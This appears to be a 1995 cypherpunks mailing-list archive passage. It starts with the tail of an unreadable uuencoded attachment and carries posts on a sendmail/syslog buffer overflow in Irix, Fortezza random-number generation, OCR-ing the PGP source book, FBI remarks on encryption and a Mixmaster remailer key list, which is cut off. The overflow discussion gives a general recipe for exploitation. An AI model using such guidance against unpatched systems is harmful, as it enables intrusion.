M9&.L)HI=3CE!*I,\H.Y4Y*6]#9ROP).!<F>*'#-YLS\&5."M"_GI/B#"#J T
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
/HJ\Z$-C_ %)CF>/=:P  
 
end




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Fri, 22 Sep 95 17:04:54 PDT
To: perry@piermont.com
Subject: Re: netscape bug
Message-ID: <199509230003.RAA06024@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DFALB4.A5u@sgi.sgi.com>, "Perry E. Metzger" <perry@piermont.com> writes:

> I can tell you in general terms -- I don't write MIPS assembler
> myself. However, I will point out to you that you use an ancient
> Sendmail, and that it uses syslog(3) on user produced data, and that
> syslog uses a static buffer. Trick sendmail into logging something
> very big, and you can do what you like. The 8lgm people wrote a demo
> for Sparc as a proof of concept.

Hmm, after having looked at the syslogd code, it looks like this
particular bug has been fixed for at least several years.  However,
there sure are a hell of a lot of fixed size buffers being alocated off
the stack and some of them are being used in unsafe ways.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave_Neuenschwander@va.arca.com (Dave Neuenschwander)
Date: Fri, 22 Sep 95 14:27:01 PDT
To: Jeff_Williams@va.arca.com
Subject: Re: Fwd: Re: Project: a standard cell random number generator
Message-ID: <920706973.5067212@va.arca.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff,

Yes Fortezza cards can be instructed to produce a random number through one
of its library calls (someday they'll have a real API).  One of the
diagnostic tools I had tested this function.  What algorithm do they use?
Haven't a clue.  Sources say that the RNG implementation may vary from vendor
to vendor (i.e., GTC, Spyrus, Mykotronix, etc.).

Daven

----------------------------------------------------------------------
Arca Systems, Inc.                     Leaders in Security Integration
----------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bret@bjohns.win.net (Bret A. Johnson)
Date: Fri, 22 Sep 95 16:27:39 PDT
To: cjs@netcom.com (Christopher J. Shaulis)
Subject: Re: Netscape to end Linux support?
Message-ID: <1871@bjohns.win.net>
MIME-Version: 1.0
Content-Type: text/plain


What? Who can i call at Netscape?

I have not gotten a recent version to work with 1.2.8..


 
>> 
>> And the sad part is that now that they have announced that they are
>> dropping their unofficial Linux support, I really want to hurt
>> Netscape badly.
>> 
>> Sigh.
>> 
>Anyone got a pointer to this announcement?
>
>Damn!  Just when I was starting to like them ...
>
>-- 
>Jeff Simmons                           jsimmons@goblin.punk.net
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Fri, 22 Sep 95 17:50:37 PDT
To: perry@piermont.com
Subject: Re: netscape bug
Message-ID: <199509230049.RAA06102@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


I said:

In article <DFALB4.A5u@sgi.sgi.com>, "Perry E. Metzger" <perry@piermont.com> writes:

>> I can tell you in general terms -- I don't write MIPS assembler
>> myself. However, I will point out to you that you use an ancient
>> Sendmail, and that it uses syslog(3) on user produced data, and that
>> syslog uses a static buffer. Trick sendmail into logging something
>> very big, and you can do what you like. The 8lgm people wrote a demo
>> for Sparc as a proof of concept.

> Hmm, after having looked at the syslogd code, it looks like this
> particular bug has been fixed for at least several years.  However,
> there sure are a hell of a lot of fixed size buffers being alocated off
> the stack and some of them are being used in unsafe ways.

Whoops.  Having done a little more checking, it appears that this bug
does indeed occur in all current version of Irix.  There's a patch for
it (patch 825) that will be out imminently.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 22 Sep 95 17:39:00 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape sub rosa?
Message-ID: <ac88a5dd0102100431c2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:30 AM 9/21/95, Matthias Jordan wrote:
>Hello, Tim!
>
>> Gee, where's that "Cypherpunks logo" when you really need it?
>>
>> A rose covering the Netscape "N" logo? A crypto eagle swooping down and
>> pecking at weak keys?
>
>How about an anarchism-A (an A in i circle) whith the circle not
>being totally closed thus describing a C?

That was actually done by someone in Monte Carlo when I was giving a talk
on crypto anarchy. Somebody drew in this anarchy-in-a-C on an announcement
of my talk. I still have this.

ObCypherpunks Relevance: This is "coding in C," isn't it?

--Tim May

BTW,  to set the record straight, my "Gee, where's that "Cypherpunks logo"
when your really need it?" was tongue-in-cheek (a kind of irony, for you
foreigners).


Notice: Don't expect me to reply to trivial questions and complaints.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hortmann <michaelh@Informatik.Uni-Bremen.DE>
Date: Fri, 22 Sep 95 08:53:02 PDT
To: cypherpunks@toad.com
Subject: new source of PGP sourcecode
Message-ID: <199509221554.RAA22108@bettina.informatik.uni-Bremen.de>
MIME-Version: 1.0
Content-Type: text/plain


Michael Hortmann
Dept. of Mathematics
University of Bremen
michaelh@informatik.uni-Bremen.de

PGP public key by finger
____________


Reconstructing PGP 2.6.1 Sourcecode by Scanning and OCR'ing the MIT-Press Book


It has always been somewhat awkward to produce legal versions of PGP
outside the US, requiring a lot of extra work.

Recently, MIT-Press published the book

	Philip Zimmermann
	PGP Source Code and Internals
	
which can be purchased in any bookstore.

In the foreword it is mentioned that this book may not be exportable, because
it has not been granted a "Commodities Jurisdiction" (CJ) by the US State
Department. However, the international book distributors don't seem to take
notice of that.

Presently, I'm trying to find out what the legal status of the book may be
in Germany, if it would be legitimate to request me to destroy it, or if on
the contrary I can legally extract its contents and publish the result
on the Internet.

In the meantime I have asked some of my students to scan the book.
This has already been accomplished, resulting in about 150MB image files.
Right now the OCR process is on its way; by looking at samples we are
optimistic that most mistakes will be found and corrected by a semiautomatic
editing process; what mistakes remain should be detected by the compiler.

As we will keep the image files, the original OCR files, the awk-scripts
and intermediate files of the editing process, there can be no doubt
that the final sourcecode has resulted from the book, and not from
an illegal ftp. Each file will be marked as of this origin.

When I'm convinced of the legality of this course of action, I will give
notice on the Net and deposit the final product and the intermediate files
under appropriate names in

          ftp://ftp.uni-Bremen.de/pub/security/crypt/

For the Net-community it may be interesting to know now that such a project is
on its way.

_______




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Fri, 22 Sep 95 14:59:38 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: ip: Freeh: Kiddie Porn was Encrypted (fwd)
Message-ID: <Pine.A32.3.91.950922175903.20886D-100000@POWERED.ZOO.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


From: sobel@epic.org (David L. Sobel)


In an address at the International Cryptography Institute
conference in Washington today, FBI Director Louis Freeh
revealed that the Bureau encountered encrypted material during
the course of its "Innocent Images" investigation.  That
operation recently led to dozens of nationwide arrests for
alleged trafficking in child pornography via America Online.
Freeh also disclosed that encrypted files were found during the
course of a terrorism investigation in the Philippines involving
an alleged plot to bomb a U.S. airliner and assassinate Pope
John Paul II.

The FBI Director characterized encryption as a "public safety"
issue and stated that the FBI and law enforcement agencies
around the world "will not tolerate" a situation in which the
wide availability of encryption may impede those agencies'
"public safety functions."  While noting that the current U.S.
government policy is to encourage the "voluntary" adoption of
key-escrowed encryption techniques, Freeh raised the specter of
a mandated "solution."  Freeh stressed that the FBI "prefers" a
"voluntary approach," but likened the encryption issue to last
year's Digital Telephony debate, where the FBI first attempted
to achieve voluntary compliance but eventually sought and
obtained a legislative mandate to assure law enforcement access
to digital communications.  Freeh indicated that "if consensus
is impossible" on the encryption issue, the FBI "may consider
other approaches."

Following his prepared address, Freeh was asked why the FBI
needs key-escrow when it has apparently been successful in
decrypting information encountered in the cited investigations.
His response to this question was somewhat vague, leaving
unanswered the question of whether or not the Bureau was, in
fact, able to decrypt the encrypted files seized in the
"Innocent Images" investigation.  More information on this
point is likely to emerge as these cases come to trial.


Davis Sobel
Legal Counsel
Electronic Privacy Information Center
http://www.epic.org





-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQB1AwUBMGMxs75ALmeTVXAJAQE+8gL/SYfKkwRCROh5jPW/WmhHfpjze4u1W32H
iA7jwFUilD1kawEzngqtmQoTwjYnpD8ShwDIIgmYnCNMwf4wYdm8FNZGvzenj/jx
8a20Xhw/aqLRL/qum/gMHTnhlEMTMlha
=4U03
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@alpha.jpunix.com>
Date: Fri, 22 Sep 95 16:35:43 PDT
To: cypherpunks@toad.com
Subject: 2 new MixMasters
Message-ID: <199509222335.SAA08173@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone!

	There are two new type-II remailers that just started in 
operation today. These are type-II only remailers. There is no type-I 
support. I vouch for these two remailers as I know the individuals 
running them personally. Below are the public keys for these sites. As a 
matter of fact, here is the type2.list and pubring.mix that 
mixmaster@vishnu.alias.net uses.

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.

type2.list:

vishnu mixmaster@vishnu.alias.net bb460f08811a98682def423d30852d11 2.0
spook remailer@spook.alias.net ca8c8679f7b1cbdcff46d780fba97673 2.0
mix mixmaster@obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1
crown mixmaster@kether.alias.net 409deae815e07f4c40188de1148c1499 2.0b11
knight mixmaster@aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33 2.0
robomix robo@c2.org 3d523f1fd30b5a1c57214960a00f1c4e 2.0b11
hroller hroller@c2.org 0b7e31bbfbb0159eea07144ab15b45f3 2.0b11
syrinx syrinx@c2.org 6c4e7372e84d7092e0d0e69c20d5be46 2.0b11
rebma mixer@rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11
replay remailer@replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11
hacktic remailer@utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222 2.0b11
crynwr remailer@crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11
flame remailer@flame.alias.net 64bbf500097b541a8ddcb2dd80373238 2.0b11
gondolin mixmaster@gondolin.org 1d767b08fefa0a79d508be73e472d326 2.0.1
q q@c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1
Armadillo remailer@armadillo.com 7251877ae6fed509ebf7567715974d1b 2.0.1
precipice mixmaster@mix.precipice.com 05fef5887ac55dfe7379d0ef4a2a0c4b 2.0.1
anon mixmaster@anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b
secrets secret@secret.alias.net bc2e4251dbddfa74dfae8b274904c2be 2.0.2b

pubring.mix

mix mixmaster@obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1

- -----Begin Mix Key-----
db91418edac3a4d7329feaee0b79c74f
258
AATL25WGQY5CMM0/xBjYtuN6IT75h+aBQwwKqZZc
isOrqdsl8HWAzARrB0iAtcr34c2qqPBzSRNa5UE8
d3jOYu/wp9K9M5abUSRogcDl7gkPlqxc+e72SdKd
2Gdgib8VDGVLpJdaPk4uSY/pkmsYB30OaQH3W8dU
PPciTvSJKAYcTQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

vishnu mixmaster@vishnu.alias.net bb460f08811a98682def423d30852d11 2.0b11

- -----Begin Mix Key-----
bb460f08811a98682def423d30852d11
258
AAShg2h4xGHueryUFNsFBbtSGZBcj+oDImFMkOZA
EQPcbeG6ReEnTnoQ8HBgwtx9isMT9hZ93lBaRY07
ygupHQRi6f+FnlQEZTKqOe+8E+WyDx+ox/1ywgt+
KGFOW+t8WRXA/loKuqD0KH4pwpe7FYE0arGbtm4J
EscGM2DE3TeS3QAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

kethermix mixmaster@kether.alias.net 409deae815e07f4c40188de1148c1499 2.0b11

- -----Begin Mix Key-----
409deae815e07f4c40188de1148c1499
258
AASySwFrEZJjUxIPXamqGuKDf3/4TnsOv9dhvs5r
FgVY2MxR7K497jLRwYBPlp8z5JrX21WMbMCBXS2x
8gD2kttZwD5uA05AjujxZzIYA69O2FfRuJ4CKRWW
tdqlzZBXrwzFmMQm45ZocMm6cz+iR373qbgimRgo
U4O0GT7CL6DxtwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

knight mixmaster@aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33 2.0

- -----Begin Mix Key-----
6bb0d89a29fd188c67b8e04516b5af33
258
AATOSyg7N2PVg9VgA8voDWglq6ESNBLqH0heB2iE
NfvmR/VnyAHCb4ZBtHzvM7ZRBdXYmH/Jt490wg6O
ZCbhcIceFKSsibLEH77+111isAhUbHvn0Nh9gOI7
